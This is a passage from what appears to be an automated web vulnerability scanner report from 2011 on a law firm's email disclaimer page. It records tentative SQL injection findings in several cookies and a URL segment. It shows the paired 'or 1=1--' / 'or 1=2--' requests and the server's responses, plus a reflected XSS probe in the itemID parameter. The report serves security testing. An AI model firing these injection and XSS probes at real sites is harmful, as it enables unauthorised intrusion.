User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d1--%20; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:06:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d2--%20; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176368;path=/
Set-Cookie: CFTOKEN=71631396;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.14. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 17943346%20or%201%3d1--%20 and 17943346%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:06:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176385;path=/
Set-Cookie: CFTOKEN=23633185;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.15. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 59265610'%20or%201%3d1--%20 and 59265610'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm59265610'%20or%201%3d1--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /emaildisclaimer.cfm59265610'%20or%201%3d2--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.16. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 60403110'%20or%201%3d1--%20 and 60403110'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:06:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.17. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21125157'%20or%201%3d1--%20 and 21125157'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:06:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.18. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 14813370%20or%201%3d1--%20 and 14813370%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d1--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:06:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d2--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.19. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16707661'%20or%201%3d1--%20 and 16707661'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

